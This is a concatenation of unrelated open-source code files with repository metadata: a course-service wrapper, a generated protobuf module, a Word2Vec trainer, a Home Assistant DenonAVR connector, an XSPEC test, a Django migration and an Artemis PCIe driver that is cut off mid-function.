c89927df7078e8bf390e1f73ca56617223ac32d4 | cef4f2e3357577bf56d3181dba988d0006d796b9 | /Projects/CourseInfo/Services/BussinessLogicServices/CourseService-old.py | 3ecae3d629720953d59c8dacbef0d7c8def24fd4 | [] | no_license | IshaShah27/E6156F21 | 5256715399f58d5f03dc6b4b8cf8e3920eb55bc7 | 8769203cf61a5ca96d5baa5ad1be34b1031ffffe | refs/heads/main | 2023-08-26T22:07:13.469515 | 2021-10-18T21:31:01 | 2021-10-18T21:31:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,613 | py | import Services.DataAccessServices.CourseWorksAdapter as cw_adapter
class Student():
    """Thin wrapper around one CourseWorks student record (a JSON dict)."""
    def __init__(self, context, j_data):
        self._context = context
        self.id = j_data["id"]
        self.user_id = j_data["sis_user_id"]
        self.login_id = j_data["login_id"]
        # sortable_name is "Last, First"; index instead of unpacking so any
        # extra commas are ignored exactly as before.
        parts = j_data["sortable_name"].split(",")
        self.name = {
            "last_name": parts[0],
            "first_name": parts[1]
        }
    def to_json(self):
        """Serialise the public fields (not the context) to a plain dict."""
        return {
            "id": self.id,
            "name": self.name,
            "user_id": self.user_id,
            "login_id": self.login_id,
        }
class Course():
    """Domain object for a CourseWorks course.

    The course_code field has the shape NO_SECTION_YEAR_SEM...; the
    semester is the first character of the fourth underscore field.
    """
    _field_list = ["id", "name", "uuid", "course_code_full", "course_no", "section", "year", "semester"]
    def __init__(self, context, j_data):
        self._context = context
        self.id = j_data["id"]
        self.name = j_data["name"]
        self.uuid = j_data["uuid"]
        self.course_code_full = j_data["course_code"]
        code_parts = self.course_code_full.split("_")
        self.course_no = code_parts[0]
        self.section = code_parts[1]
        self.year = code_parts[2]
        self.semester = code_parts[3][0]
    def to_json(self):
        """Serialise the fields named in _field_list to a plain dict."""
        return {f: getattr(self, f) for f in Course._field_list}
    @classmethod
    def set_context(cls, context):
        cls._context = context
    @classmethod
    def get_courses(cls, role=None):
        """Fetch all courses (optionally by role); None when nothing found."""
        cw_adapter.Adapter.set_context(cls._context)
        res = cw_adapter.Adapter.get_courses(role=role)
        if not res:
            return None
        return [Course(cls._context, j_data) for j_data in res]
    @classmethod
    def get_course(cls, course_id):
        """Fetch a single course by id; None when nothing found."""
        cw_adapter.Adapter.set_context(cls._context)
        res = cw_adapter.Adapter.get_courses(course_id=course_id)
        if not res:
            return None
        return Course(cls._context, res[0])
    def get_students(self):
        """Fetch this course's roster; None unless the adapter returns 200."""
        cw_adapter.Adapter.set_context(self._context)
        res = cw_adapter.Adapter.get_students(self.id)
        if res[0] != 200:
            return None
        return [Student(self._context, j_data) for j_data in res[1]]
| [
"[email protected]"
] | |
e32ac73c3af16ed8be75891963807a7fb28d0ba1 | bc441bb06b8948288f110af63feda4e798f30225 | /next_builder_sdk/model/flowable/process_instance_pb2.py | a763c2c5d25ebaa8d7f7708cb7b4d2a1e212f761 | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | true | 10,254 | py | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: process_instance.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from next_builder_sdk.model.flowable import process_variable_pb2 as next__builder__sdk_dot_model_dot_flowable_dot_process__variable__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='process_instance.proto',
package='flowable',
syntax='proto3',
serialized_options=_b('ZBgo.easyops.local/contracts/protorepo-models/easyops/model/flowable'),
serialized_pb=_b('\n\x16process_instance.proto\x12\x08\x66lowable\x1a\x36next_builder_sdk/model/flowable/process_variable.proto\"\xb9\x03\n\x17\x46lowableProcessInstance\x12\n\n\x02id\x18\x01 \x01(\t\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x13\n\x0b\x62usinessKey\x18\x03 \x01(\t\x12\x11\n\tsuspended\x18\x04 \x01(\x08\x12\r\n\x05\x65nded\x18\x05 \x01(\x08\x12\x1b\n\x13processDefinitionId\x18\x06 \x01(\t\x12\x1d\n\x15processDefinitionName\x18\x07 \x01(\t\x12$\n\x1cprocessDefinitionDescription\x18\x08 \x01(\t\x12\x12\n\nactivityId\x18\t \x01(\t\x12\x13\n\x0bstartUserId\x18\n \x01(\t\x12\x12\n\ncallbackId\x18\x0b \x01(\t\x12\x14\n\x0c\x63\x61llbackType\x18\x0c \x01(\t\x12\x13\n\x0breferenceId\x18\r \x01(\t\x12\x15\n\rreferenceType\x18\x0e \x01(\t\x12\x10\n\x08tenantId\x18\x0f \x01(\t\x12\x11\n\tcompleted\x18\x10 \x01(\x08\x12\x11\n\tstartTime\x18\x11 \x01(\t\x12\x34\n\tvariables\x18\x12 \x03(\x0b\x32!.flowable.FlowableProcessVariableBDZBgo.easyops.local/contracts/protorepo-models/easyops/model/flowableb\x06proto3')
,
dependencies=[next__builder__sdk_dot_model_dot_flowable_dot_process__variable__pb2.DESCRIPTOR,])
_FLOWABLEPROCESSINSTANCE = _descriptor.Descriptor(
name='FlowableProcessInstance',
full_name='flowable.FlowableProcessInstance',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='id', full_name='flowable.FlowableProcessInstance.id', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='name', full_name='flowable.FlowableProcessInstance.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='businessKey', full_name='flowable.FlowableProcessInstance.businessKey', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='suspended', full_name='flowable.FlowableProcessInstance.suspended', index=3,
number=4, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='ended', full_name='flowable.FlowableProcessInstance.ended', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='processDefinitionId', full_name='flowable.FlowableProcessInstance.processDefinitionId', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='processDefinitionName', full_name='flowable.FlowableProcessInstance.processDefinitionName', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='processDefinitionDescription', full_name='flowable.FlowableProcessInstance.processDefinitionDescription', index=7,
number=8, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='activityId', full_name='flowable.FlowableProcessInstance.activityId', index=8,
number=9, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='startUserId', full_name='flowable.FlowableProcessInstance.startUserId', index=9,
number=10, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callbackId', full_name='flowable.FlowableProcessInstance.callbackId', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='callbackType', full_name='flowable.FlowableProcessInstance.callbackType', index=11,
number=12, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='referenceId', full_name='flowable.FlowableProcessInstance.referenceId', index=12,
number=13, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='referenceType', full_name='flowable.FlowableProcessInstance.referenceType', index=13,
number=14, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='tenantId', full_name='flowable.FlowableProcessInstance.tenantId', index=14,
number=15, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='completed', full_name='flowable.FlowableProcessInstance.completed', index=15,
number=16, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='startTime', full_name='flowable.FlowableProcessInstance.startTime', index=16,
number=17, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='variables', full_name='flowable.FlowableProcessInstance.variables', index=17,
number=18, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=93,
serialized_end=534,
)
_FLOWABLEPROCESSINSTANCE.fields_by_name['variables'].message_type = next__builder__sdk_dot_model_dot_flowable_dot_process__variable__pb2._FLOWABLEPROCESSVARIABLE
DESCRIPTOR.message_types_by_name['FlowableProcessInstance'] = _FLOWABLEPROCESSINSTANCE
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
FlowableProcessInstance = _reflection.GeneratedProtocolMessageType('FlowableProcessInstance', (_message.Message,), {
'DESCRIPTOR' : _FLOWABLEPROCESSINSTANCE,
'__module__' : 'process_instance_pb2'
# @@protoc_insertion_point(class_scope:flowable.FlowableProcessInstance)
})
_sym_db.RegisterMessage(FlowableProcessInstance)
DESCRIPTOR._options = None
# @@protoc_insertion_point(module_scope)
| [
"[email protected]"
] | |
8c626ab93dbf410bba8151b8cdd660481d96c411 | a2c575fe2cf4afa40ec2adb8d5b98ec47693665b | /thread_api/model_builder.py | 1408f69c6ff601cbc6c4b8fa998e7f5224c3adaf | [] | no_license | cosmicBboy/confesh-bots | b530ba866fee5d276a8428670f2b2fb3a3f1ca3b | e1115a7c3f3cfb13d5b2e185c0b9410ccc09f5e4 | refs/heads/master | 2021-03-19T08:28:25.579876 | 2018-04-12T20:13:05 | 2018-04-12T20:13:05 | 44,482,435 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,796 | py | '''Module for Building a Model
Train a Word2Vec Model based on secret and comment text on www.confesh.com
1. Read secret and comment text
2. Train a Word2Vec model
3. Serialize model to S3
'''
import logging
import pandas as pd
import mongo_creds as creds
import json
import sys
import smart_open as so
from collections import OrderedDict
from argparse import ArgumentParser
from gensim.models import Word2Vec
from stream_mongo import MongoStreamer
from preprocessor import TextPreprocessor
from s3_utils import create_model_key
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s',
level=logging.INFO, stream=sys.stdout)
tp = TextPreprocessor()
class Word2VecModelBuilder(object):
    """Train a gensim Word2Vec model and persist/restore it via S3.

    ``model`` starts out as the Word2Vec *class*; ``fit`` replaces it with
    a trained instance.  Artifacts are written with smart_open to keys
    produced by ``create_model_key``.
    """

    def __init__(self, params):
        # Keep the untrained class around until fit() is called.
        self.model = Word2Vec
        self.params = params

    def fit(self, train_docs):
        """Tokenize ``train_docs`` (dicts with a 'text' key) and train."""
        corpus = [tp.preprocess(doc['text']) for doc in train_docs]
        self.model = self.model(corpus, **self.params)

    def save_model(self, model_name, document_ids):
        """Serialize the trained model, its params and its doc ids to S3."""
        keys = self._get_s3_keys(model_name)
        self.model.save(keys['model'])
        with so.smart_open(keys['params'], 'wb') as fout:
            fout.write(json.dumps(self.params, sort_keys=True))
        with so.smart_open(keys['doc_ids'], 'wb') as fout:
            fout.write(''.join(doc_id + '\n' for doc_id in document_ids))

    def load_model(self, model_name):
        """Load a previously saved model from S3 into ``self.model``."""
        self.model = self.model.load(self._get_s3_keys(model_name)['model'])

    def _get_s3_keys(self, model_name):
        """Map artifact label -> S3 key for this model name."""
        parts = (('model', 'model', 'w2v'),
                 ('params', 'params', 'json'),
                 ('doc_ids', 'doc_ids', 'txt'))
        return {label: create_model_key(model_name, stem, ext)
                for label, stem, ext in parts}
| [
"[email protected]"
] | |
1a95ee42312d01afa32e915af2536f8f124984c7 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /homeassistant/components/denonavr/receiver.py | 28969d2579256202064fcda1e7a514fa6498a181 | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 2,668 | py | """Code to handle a DenonAVR receiver."""
from __future__ import annotations
from collections.abc import Callable
import logging
from denonavr import DenonAVR
_LOGGER = logging.getLogger(__name__)
class ConnectDenonAVR:
    """Class to async connect to a DenonAVR receiver."""

    def __init__(
        self,
        host: str,
        timeout: float,
        show_all_inputs: bool,
        zone2: bool,
        zone3: bool,
        async_client_getter: Callable,
    ) -> None:
        """Initialize the class."""
        self._async_client_getter = async_client_getter
        self._receiver: DenonAVR | None = None
        self._host = host
        self._show_all_inputs = show_all_inputs
        self._timeout = timeout
        # Only the zones the user enabled are handed to denonavr.
        self._zones: dict[str, str | None] = {
            name: None
            for enabled, name in ((zone2, "Zone2"), (zone3, "Zone3"))
            if enabled
        }

    @property
    def receiver(self) -> DenonAVR | None:
        """Return the class containing all connections to the receiver."""
        return self._receiver

    async def async_connect_receiver(self) -> bool:
        """Connect to the DenonAVR receiver."""
        await self.async_init_receiver_class()
        assert self._receiver

        identity = (
            self._receiver.manufacturer,
            self._receiver.name,
            self._receiver.model_name,
            self._receiver.receiver_type,
        )
        if any(field is None for field in identity):
            _LOGGER.error(
                "Missing receiver information: manufacturer '%s', name '%s', model '%s', type '%s'",
                *identity,
            )
            return False

        _LOGGER.debug(
            "%s receiver %s at host %s connected, model %s, serial %s, type %s",
            self._receiver.manufacturer,
            self._receiver.name,
            self._receiver.host,
            self._receiver.model_name,
            self._receiver.serial_number,
            self._receiver.receiver_type,
        )
        return True

    async def async_init_receiver_class(self) -> None:
        """Initialize the DenonAVR class asynchronously."""
        receiver = DenonAVR(
            host=self._host,
            show_all_inputs=self._show_all_inputs,
            timeout=self._timeout,
            add_zones=self._zones,
        )
        # Use httpx.AsyncClient getter provided by Home Assistant
        receiver.set_async_client_getter(self._async_client_getter)
        await receiver.async_setup()
        self._receiver = receiver
| [
"[email protected]"
] | |
8bfbca51d0b37ee289502c1fbaaf5efe3b2fda3e | debffca14a39dbeaf6af2f1b73ea530913e2cdad | /astromodels/tests/test_load_xspec_models.py | e10e14154daf319d6f29bd8409ebbdc01001fd9b | [
"BSD-3-Clause"
] | permissive | BjoernBiltzinger/astromodels | 6986695abfc4510a62254854fd0977b1e96e192f | d94a3d3bc607def2b5e3cd145c3922e0a00a7b15 | refs/heads/master | 2022-11-03T19:28:16.949036 | 2019-03-12T17:05:59 | 2019-03-12T17:05:59 | 175,420,543 | 0 | 0 | BSD-3-Clause | 2019-03-13T12:53:03 | 2019-03-13T12:53:03 | null | UTF-8 | Python | false | false | 641 | py | import pytest
import astropy.units as u
try:
from astromodels.xspec import *
except:
has_XSPEC = False
else:
has_XSPEC = True
# This defines a decorator which can be applied to single tests to
# skip them if the condition is not met
skip_if_xspec_is_not_available = pytest.mark.skipif(not has_XSPEC,
reason="XSPEC not available")
@skip_if_xspec_is_not_available
def test_xspec_load():
    """Smoke-test the XSPEC bindings: compose a model from three XSPEC
    components and evaluate it both unitless and with astropy units.
    """
    # no need to do anything really
    s = XS_phabs() * XS_powerlaw() + XS_bbody()

    print(s(1.0))

    # Evaluate again with units attached (keV in, photon flux density out).
    s.set_units(u.keV, 1 / (u.keV * u.cm**2 * u.s))

    print(s(1.0 * u.keV))
| [
"[email protected]"
] | |
0aab616a8c0ca629a1f4e434c91a20302f47285b | 6fa701cdaa0d83caa0d3cbffe39b40e54bf3d386 | /google/monitoring/metricsscope/v1/monitoring-metricsscope-v1-py/google/monitoring/metricsscope_v1/__init__.py | 1530640d664a0943bb90109a53b0c43ead78fa5b | [
"Apache-2.0"
] | permissive | oltoco/googleapis-gen | bf40cfad61b4217aca07068bd4922a86e3bbd2d5 | 00ca50bdde80906d6f62314ef4f7630b8cdb6e15 | refs/heads/master | 2023-07-17T22:11:47.848185 | 2021-08-29T20:39:47 | 2021-08-29T20:39:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,521 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from .services.metrics_scopes import MetricsScopesClient
from .services.metrics_scopes import MetricsScopesAsyncClient
from .types.metrics_scope import MetricsScope
from .types.metrics_scope import MonitoredProject
from .types.metrics_scopes import CreateMonitoredProjectRequest
from .types.metrics_scopes import DeleteMonitoredProjectRequest
from .types.metrics_scopes import GetMetricsScopeRequest
from .types.metrics_scopes import ListMetricsScopesByMonitoredProjectRequest
from .types.metrics_scopes import ListMetricsScopesByMonitoredProjectResponse
from .types.metrics_scopes import OperationMetadata
__all__ = (
'MetricsScopesAsyncClient',
'CreateMonitoredProjectRequest',
'DeleteMonitoredProjectRequest',
'GetMetricsScopeRequest',
'ListMetricsScopesByMonitoredProjectRequest',
'ListMetricsScopesByMonitoredProjectResponse',
'MetricsScope',
'MetricsScopesClient',
'MonitoredProject',
'OperationMetadata',
)
| [
"bazel-bot-development[bot]@users.noreply.github.com"
] | bazel-bot-development[bot]@users.noreply.github.com |
b4d83d9b56e607732cd70a9353169eb6c897b04c | 2a2435c1955f61727c9968ea87a599d6e999c1bd | /core/migrations/0010_billingaddress.py | 88d7b724fb03f794792b0d947aca41ec9c668d05 | [] | no_license | mahmoudabuelnaga/dje-commerce | 9a5ba483b568613860d55c6062a01cd08ff9466c | 964917da53dc6045c4374943fce68d7de0edad37 | refs/heads/master | 2020-12-15T17:59:11.443834 | 2020-02-23T23:55:29 | 2020-02-23T23:55:29 | 235,202,147 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,042 | py | # Generated by Django 2.2 on 2020-01-20 02:04
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django_countries.fields
class Migration(migrations.Migration):
    # Auto-generated by Django 2.2 on 2020-01-20: creates the
    # BillingAddress table with a FK to the configured user model.

    dependencies = [
        # The user FK below targets the active user model, so depend on it
        # via its swappable reference rather than a hard-coded app label.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('core', '0009_auto_20200119_0012'),
    ]

    operations = [
        migrations.CreateModel(
            name='BillingAddress',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('street_address', models.CharField(max_length=255)),
                ('apartment_address', models.CharField(max_length=255)),
                # NOTE(review): multiple=True stores a *list* of countries for
                # a billing address -- mirrors the model definition; confirm
                # that is intended.
                ('countries', django_countries.fields.CountryField(max_length=746, multiple=True)),
                ('zip', models.CharField(max_length=100)),
                ('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| [
"[email protected]"
] | |
d1df2196740c711b82b68bf80a7a61e19b6efa9f | 84b99814136f134fc2238a266225ed8342b6ede0 | /artemis_pcie/artemis_pcie.py | 467fc4772e63824248331ac13bb98a51834d7d05 | [
"MIT"
] | permissive | CospanDesign/nysa-artemis-pcie-platform | 1f25f3e940c43acc631d9c0cb1ecdee26e846af0 | 844be4b14b27520eb4bb15b8a2f18d7797b91943 | refs/heads/master | 2021-01-21T04:35:18.492160 | 2016-07-04T20:25:43 | 2016-07-04T20:25:43 | 48,339,973 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,373 | py | """ artemis_pcie
Concrete interface for Nysa on the artemis_pcie board
"""
__author__ = '[email protected]'
import sys
import os
import time
from collections import OrderedDict
from array import array as Array
from nysa.cbuilder.sdb import SDBError
from nysa.host.nysa import Nysa
from nysa.host.nysa import NysaError
from nysa.host.nysa import NysaCommError
from nysa.host.driver.utils import dword_to_array
from nysa.host.driver.utils import array_to_dword
from nysa.common.print_utils import print_32bit_hex_array
IDWORD = 0xCD15DBE5
CMD_COMMAND_RESET = 0x0080
CMD_PERIPHERAL_WRITE = 0x0081
CMD_PERIPHERAL_WRITE_FIFO = 0x0082
CMD_PERIPHERAL_READ = 0x0083
CMD_PERIPHERAL_READ_FIFO = 0x0084
CMD_MEMORY_WRITE = 0x0085
CMD_MEMORY_READ = 0x0086
CMD_DMA_WRITE = 0x0087
CMD_DMA_READ = 0x0088
CMD_PING = 0x0089
CMD_READ_CONFIG = 0x008A
BAR0_ADDR = 0x00000000
STATUS_BUFFER_ADDRESS = 0x01000000
WRITE_BUFFER_A_ADDRESS = 0x02000000
WRITE_BUFFER_B_ADDRESS = 0x03000000
READ_BUFFER_A_ADDRESS = 0x04000000
READ_BUFFER_B_ADDRESS = 0x05000000
BUFFER_SIZE = 0x00000400
MAX_PACKET_SIZE = 0x40
#Register Values
HDR_STATUS_BUF_ADDR = "status_buf"
HDR_BUFFER_READY = "hst_buffer_rdy"
HDR_WRITE_BUF_A_ADDR = "write_buffer_a"
HDR_WRITE_BUF_B_ADDR = "write_buffer_b"
HDR_READ_BUF_A_ADDR = "read_buffer_a"
HDR_READ_BUF_B_ADDR = "read_buffer_b"
HDR_BUFFER_SIZE = "dword_buffer_size"
HDR_INDEX_VALUEA = "index value a"
HDR_INDEX_VALUEB = "index value b"
HDR_DEV_ADDR = "device_addr"
STS_DEV_STATUS = "device_status"
STS_BUF_RDY = "dev_buffer_rdy"
STS_BUF_POS = "hst_buf_addr"
STS_INTERRUPT = "interrupt"
HDR_AUX_BUFFER_READY = "hst_buffer_rdy"
REGISTERS = OrderedDict([
(HDR_STATUS_BUF_ADDR , "Address of the Status Buffer on host computer" ),
(HDR_BUFFER_READY , "Buffer Ready (Controlled by host)" ),
(HDR_WRITE_BUF_A_ADDR , "Address of Write Buffer 0 on host computer" ),
(HDR_WRITE_BUF_B_ADDR , "Address of Write Buffer 1 on host computer" ),
(HDR_READ_BUF_A_ADDR , "Address of Read Buffer 0 on host computer" ),
(HDR_READ_BUF_B_ADDR , "Address of Read Buffer 1 on host computer" ),
(HDR_BUFFER_SIZE , "Size of the buffer on host computer" ),
(HDR_INDEX_VALUEA , "Value of Index A" ),
(HDR_INDEX_VALUEB , "Value of Index B" ),
(HDR_DEV_ADDR , "Address to read from or write to on device" ),
(STS_DEV_STATUS , "Device Status" ),
(STS_BUF_RDY , "Buffer Ready Status (Controller from device)" ),
(STS_BUF_POS , "Address on Host" ),
(STS_INTERRUPT , "Interrupt Status" ),
(HDR_AUX_BUFFER_READY , "Buffer Ready (Controlled by host)" )
])
SB_READY = "ready"
SB_WRITE = "write"
SB_READ = "read"
SB_FIFO = "flag_fifo"
SB_PING = "ping"
SB_READ_CFG = "read_cfg"
SB_UNKNOWN_CMD = "unknown_cmd"
SB_PPFIFO_STALL = "ppfifo_stall"
SB_HOST_BUF_STALL = "host_buf_stall"
SB_PERIPH = "flag_peripheral"
SB_MEM = "flag_mem"
SB_DMA = "flag_dma"
SB_INTERRUPT = "interrupt"
SB_RESET = "reset"
SB_DONE = "done"
SB_CMD_ERR = "error"
STATUS_BITS = OrderedDict([
(SB_READY , "Ready for new commands" ),
(SB_WRITE , "Write Command Enabled" ),
(SB_READ , "Read Command Enabled" ),
(SB_FIFO , "Flag: Read/Write FIFO" ),
(SB_PING , "Ping Command" ),
(SB_READ_CFG , "Read Config Request" ),
(SB_UNKNOWN_CMD , "Unknown Command" ),
(SB_PPFIFO_STALL , "Stall Due to Ping Pong FIFO" ),
(SB_HOST_BUF_STALL , "Stall Due to Host Buffer" ),
(SB_PERIPH , "Flag: Peripheral Bus" ),
(SB_MEM , "Flag: Memory" ),
(SB_DMA , "Flag: DMA" ),
(SB_INTERRUPT , "Device Initiated Interrupt" ),
(SB_RESET , "Reset Command" ),
(SB_DONE , "Command Done" ),
(SB_CMD_ERR , "Error executing command" )
])
ARTEMIS_MEMORY_OFFSET = 0x0100000000
class ArtemisPcie(Nysa):
    """Nysa host implementation for the Artemis PCIe board.

    All traffic goes through the character device at ``path``.  Seeking to
    the end of the device puts the driver in "command mode" (control
    packets); seeking back to offset 0 returns it to "data mode" (bulk
    payload).  Every bus transaction is framed with a 4-dword header:
    [IDWORD, command+flags, dword count, address].
    """

    def __init__(self, path, status=None):
        """Open the PCIe character device at ``path`` for read/write."""
        Nysa.__init__(self, status)
        self.path = path
        self.dev = os.open(path, os.O_RDWR)

    def set_command_mode(self):
        """Switch the driver to command mode (seek to end of device)."""
        # XXX: Change this to a seperate file
        os.lseek(self.dev, 0, os.SEEK_END)

    def set_data_mode(self):
        """Switch the driver back to data mode (seek to start of device)."""
        # XXX: Change this to a seperate file
        os.lseek(self.dev, 0, os.SEEK_SET)

    def set_dev_addr(self, address):
        """Latch ``address`` into the device-address config register."""
        self.dev_addr = address
        # NOTE(review): NysaPCIEConfig is not imported in this module --
        # confirm where this name is expected to come from.
        reg = NysaPCIEConfig.get_config_reg(HDR_DEV_ADDR)
        self.write_pcie_reg(reg, address)

    def write_pcie_reg(self, address, data):
        """Write the single dword ``data`` to PCIe register ``address``."""
        d = Array('B')
        d.extend(dword_to_array(address))
        d.extend(dword_to_array(data))
        self.set_command_mode()
        os.write(self.dev, d)
        self.set_data_mode()

    def write_pcie_command(self, command, count, address):
        """Issue a [command, count, address] control packet in command mode."""
        d = Array('B')
        d.extend(dword_to_array(command))
        d.extend(dword_to_array(count))
        d.extend(dword_to_array(address))
        self.set_command_mode()
        os.write(self.dev, d)
        self.set_data_mode()

    def _build_bus_packet(self, base_command, length, address,
                          disable_auto_inc):
        """Frame a Nysa bus request header (shared by read and write).

        Addresses at or above ARTEMIS_MEMORY_OFFSET select the memory bus
        (command flag 0x10000) and are rebased into the memory window;
        flag 0x20000 disables address auto-increment.

        Returns:
            Array('B'): [IDWORD, command, length, address] as raw bytes.
        """
        command = base_command
        if address >= ARTEMIS_MEMORY_OFFSET:
            address -= ARTEMIS_MEMORY_OFFSET
            command |= 0x10000
        if disable_auto_inc:
            command |= 0x20000
        d = Array('B')
        d.extend(dword_to_array(IDWORD))
        d.extend(dword_to_array(command))
        d.extend(dword_to_array(length))
        d.extend(dword_to_array(address))
        return d

    def read(self, address, length=1, disable_auto_inc=False):
        """read

        Generic read command used to read data from a Nysa image

        Args:
            length (int): Number of 32 bit words to read from the FPGA
            address (int): Address of the register/memory to read
            disable_auto_inc (bool): if true, auto increment feature will
                be disabled

        Returns:
            (Array of unsigned bytes): raw data returned from Nysa

        Raises:
            NysaCommError: When a failure of communication is detected
        """
        if length == 0:
            length = 1
        d = self._build_bus_packet(0x00000002, length, address,
                                   disable_auto_inc)
        hdr_byte_len = len(d)
        hdr_dword_len = hdr_byte_len // 4
